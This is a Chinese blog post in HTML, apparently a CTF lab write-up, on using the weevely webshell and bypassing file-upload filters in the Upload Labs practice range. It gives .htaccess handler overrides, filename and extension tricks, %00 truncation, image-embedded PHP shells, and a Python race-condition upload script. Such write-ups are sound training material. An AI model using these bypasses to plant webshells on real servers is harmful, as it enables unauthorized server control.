<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/pigeon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/pigeon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"az1mus.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.18.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"width":200},"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="使用 webshell，建立与服务器的 shell 连接，控制服务器。在例子中，用到的工具为 kali 自带的 weevely。">
<meta property="og:type" content="article">
<meta property="og:title" content="Webshell 入门">
<meta property="og:url" content="https://az1mus.github.io/2023/08/30/Webshell-Introduction/index.html">
<meta property="og:site_name" content="Az1mus☆">
<meta property="og:description" content="使用 webshell，建立与服务器的 shell 连接，控制服务器。在例子中，用到的工具为 kali 自带的 weevely。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-08-30T12:50:54.000Z">
<meta property="article:modified_time" content="2023-09-03T13:24:29.715Z">
<meta property="article:author" content="az1mus">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="webshell">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://az1mus.github.io/2023/08/30/Webshell-Introduction/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://az1mus.github.io/2023/08/30/Webshell-Introduction/","path":"2023/08/30/Webshell-Introduction/","title":"Webshell 入门"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Webshell 入门 | Az1mus☆</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Az1mus☆</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-weevely"><span class="nav-number">1.</span> <span class="nav-text">使用 weevely</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0-webshell"><span class="nav-number">2.</span> <span class="nav-text">上传 webshell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#weevely-%E7%9A%84%E9%A2%9D%E5%A4%96%E6%A8%A1%E5%9D%97"><span class="nav-number">3.</span> <span class="nav-text">weevely 的额外模块</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Upload-Labs"><span class="nav-number">4.</span> <span class="nav-text">Upload Labs</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-01"><span class="nav-number">4.1.</span> <span class="nav-text">Pass-01</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-02"><span class="nav-number">4.2.</span> <span class="nav-text">Pass-02</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-03"><span class="nav-number">4.3.</span> <span class="nav-text">Pass-03</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-04"><span class="nav-number">4.4.</span> <span class="nav-text">Pass-04</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-05"><span class="nav-number">4.5.</span> <span class="nav-text">Pass-05</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-06-09"><span class="nav-number">4.6.</span> <span class="nav-text">Pass-06~09</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-10"><span class="nav-number">4.7.</span> <span class="nav-text">Pass-10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-11-12"><span class="nav-number">4.8.</span> <span class="nav-text">Pass-11~12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-13-16"><span class="nav-number">4.9.</span> <span class="nav-text">Pass-13~16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-17-18"><span class="nav-number">4.10.</span> <span class="nav-text">Pass-17~18</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="az1mus"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">az1mus</p>
  <div class="site-description" itemprop="description">Ciallo～(∠・ω< )⌒★</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">30</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/az1mus" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;az1mus" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://az1mus.github.io/2023/08/30/Webshell-Introduction/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="az1mus">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Az1mus☆">
      <meta itemprop="description" content="Ciallo～(∠・ω< )⌒★">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Webshell 入门 | Az1mus☆">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Webshell 入门
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-08-30 20:50:54" itemprop="dateCreated datePublished" datetime="2023-08-30T20:50:54+08:00">2023-08-30</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-09-03 21:24:29" itemprop="dateModified" datetime="2023-09-03T21:24:29+08:00">2023-09-03</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF%E7%9F%A5%E8%AF%86/" itemprop="url" rel="index"><span itemprop="name">CTF知识</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>使用 webshell，建立与服务器的 shell 连接，控制服务器。在例子中，用到的工具为 kali 自带的 weevely。</p>
<span id="more"></span>

<h2 id="使用-weevely"><a href="#使用-weevely" class="headerlink" title="使用 weevely"></a>使用 weevely</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[+] Run terminal or <span class="built_in">command</span> on the target</span><br><span class="line">    weevely &lt;URL&gt; &lt;password&gt; [cmd]</span><br><span class="line"></span><br><span class="line">[+] Recover an existing session</span><br><span class="line">    weevely session &lt;path&gt; [cmd]</span><br><span class="line"></span><br><span class="line">[+] Generate new agent</span><br><span class="line">    weevely generate &lt;password&gt; &lt;path&gt;</span><br></pre></td></tr></table></figure>

<p>运行 <code>weevely</code>，可以看到由软件给出的使用方式提示。</p>
<h2 id="上传-webshell"><a href="#上传-webshell" class="headerlink" title="上传 webshell"></a>上传 webshell</h2><p>webshell 通常为一个可执行的网页文件，如 PHP。上传 webshell 的方式很多，如 SQL 注入，远程文件包含，本地文件包含等。跟随 Upload Labs，可以了解到一些基础的上传 webshell 的手段。</p>
<h2 id="weevely-的额外模块"><a href="#weevely-的额外模块" class="headerlink" title="weevely 的额外模块"></a>weevely 的额外模块</h2><p>在刚启动 weevely 的时候，提示符还是<code>weevely&gt;</code>，此时输入回车即可进入 webshell，如果输入模块名即可加载对应模块。输入<code>help</code>查看全部可用模块。</p>
<h2 id="Upload-Labs"><a href="#Upload-Labs" class="headerlink" title="Upload Labs"></a>Upload Labs</h2><p>之后有关 Upload Labs 的过关 writeup 会慢慢更新到这里。</p>
<h3 id="Pass-01"><a href="#Pass-01" class="headerlink" title="Pass-01"></a>Pass-01</h3><p>上传文件，有<code>type=file</code>的上传栏，<code>on-submit</code>函数为<code>&quot;return checkFile()&quot;</code>。在代码中可以看到 js 函数<code>checkFile()</code>，实际上是一个后缀名检测。由于这个<code>on-submit</code>写在前端，直接在浏览器中 F12，将<code>&quot;return checkFile()&quot;</code>改成<code>&quot;return 1&quot;</code>即可绕过文件后缀名检测。</p>
<p><code>weevely generate passwd webshell.php</code>在当前文件夹生成<code>webshell.php</code>，上传到服务器后可以直接看到下方的“图片”，右键得到 webshell 的 URL，<code>weevely &lt;URL&gt; passwd</code>之后回车即可连上服务器的 shell。</p>
<h3 id="Pass-02"><a href="#Pass-02" class="headerlink" title="Pass-02"></a>Pass-02</h3><p>从 Pass-02 开始就是服务器端的后缀名过滤了。审查 PHP 代码，发现服务器只检查<code>uploadfile</code>的<code>type</code>，这一个标记可以在请求中修改。在 Burp Suite 的 Repeater 中将上传文件的<code>Content-Type</code>修改为<code>image/png</code>，上传成功。</p>
<h3 id="Pass-03"><a href="#Pass-03" class="headerlink" title="Pass-03"></a>Pass-03</h3><p>黑名单筛选上传的后缀名，没有包含<code>php3</code>，把 webshell 改名为 .php3 即可上传。</p>
<h3 id="Pass-04"><a href="#Pass-04" class="headerlink" title="Pass-04"></a>Pass-04</h3><p>黑名单变多了，没有包含<code>htaccess</code>。上传一个危险的<code>htaccess</code>，然后上传<code>webshell.png</code>，受到 .htaccess 文件的影响，所有的 png 会以 php 格式访问。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--preshell.htaccess--&gt;</span></span><br><span class="line">AddType application/x-httpd-php .png</span><br><span class="line"><span class="comment">&lt;!--或者--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">FilesMatch</span> &quot;<span class="attr">文件名</span>&quot;&gt;</span></span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line"><span class="tag">&lt;/<span class="name">FilesMatch</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="Pass-05"><a href="#Pass-05" class="headerlink" title="Pass-05"></a>Pass-05</h3><p>屏蔽了<code>.htaccess</code>，但是没有处理小写。选一个没被屏蔽的大小写混用后缀名，上传即可。</p>
<h3 id="Pass-06-09"><a href="#Pass-06-09" class="headerlink" title="Pass-06~09"></a>Pass-06~09</h3><p>在 Windows 系统中，文件名末尾的<code>空格</code> <code>&#39;.&#39;</code> <code>&#39;::DATA&#39;</code>会被忽略。因此可以通过修改上传的包中的文件名，在末尾添加这些字符以绕过不全的后缀名检测。如果是只去掉一次，就构造多个点和空格的组合即可。</p>
<h3 id="Pass-10"><a href="#Pass-10" class="headerlink" title="Pass-10"></a>Pass-10</h3><p>替换黑名单中的后缀名为<code>&#39;&#39;</code>。这题我会，和 SQL 绕过类似，双写<code>php</code>为<code>phphp</code>即可。</p>
<h3 id="Pass-11-12"><a href="#Pass-11-12" class="headerlink" title="Pass-11~12"></a>Pass-11~12</h3><p>00截断，在 PHP 5.3.4 之后就不能用了，大概的原理是 URL 中字符串能被 <code>%00</code> <code>0x00</code> <code>/00</code> 截断，如果有后缀名白名单但是可在请求中控制文件后缀，就可以用<code>.php%00.jpg</code>绕过。</p>
<h3 id="Pass-13-16"><a href="#Pass-13-16" class="headerlink" title="Pass-13~16"></a>Pass-13~16</h3><p>图片马，将图片和 PHP 文本拼接在一起，正常访问只能看到图片，但是 PHP 文件包含时会执行其中的代码。Upload Lab 在 www 根目录下配置有 <code>include.php</code> 文件，传参<code>?file=&lt;image file name&gt;</code>即可执行期中的代码。</p>
<p>如果服务端利用<code>imagecreatefromjpeg</code>做二次渲染，那么就放弃png或者jpg吧，用gif格式的图片就行。有兴趣可以研究 PHP 如何对 png 和 jpg 进行二次渲染，然后反向整理出插入木马的方法。</p>
<h3 id="Pass-17-18"><a href="#Pass-17-18" class="headerlink" title="Pass-17~18"></a>Pass-17~18</h3><p>条件竞争，由于在验证之前存在将文件复制或重命名的环节，多线程并发上传图片，同时不断请求，总有那么几次成功。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#upload.py</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> threading <span class="keyword">import</span> Thread</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">shell = <span class="string">&quot;webshell.php&quot;</span></span><br><span class="line">num_threads = <span class="number">20</span></span><br><span class="line"></span><br><span class="line">file = &#123;   <span class="comment">#文件信息和文件</span></span><br><span class="line">    <span class="string">&quot;upload_file&quot;</span>:<span class="built_in">open</span>(shell),</span><br><span class="line">    <span class="string">&quot;Content-Type&quot;</span>:<span class="string">&quot;application/octet-stream&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Content-Disposition&quot;</span>:<span class="string">&quot;form-data&quot;</span>,</span><br><span class="line">    <span class="string">&quot;filename&quot;</span>:<span class="string">&quot;webshell.php&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">url = <span class="string">&quot;http://upload-lab/Pass-17/index.php&quot;</span></span><br><span class="line">data = &#123;        <span class="comment">#参数</span></span><br><span class="line">    <span class="string">&quot;submit&quot;</span>:<span class="string">&quot;upload&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>():</span><br><span class="line">    res = requests.post(url, files=file, data=data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    ls = []</span><br><span class="line">    <span class="keyword">for</span> index <span class="keyword">in</span> <span class="built_in">range</span>(num_threads):</span><br><span class="line">        ls.append(Thread(target=upload()))</span><br><span class="line">        ls[index].start()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/webshell/" rel="tag"># webshell</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/08/28/Junior-SQL-Injection/" rel="prev" title="粗略的 SQL 注入总结">
                  <i class="fa fa-angle-left"></i> 粗略的 SQL 注入总结
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="star-o"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">az1mus</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
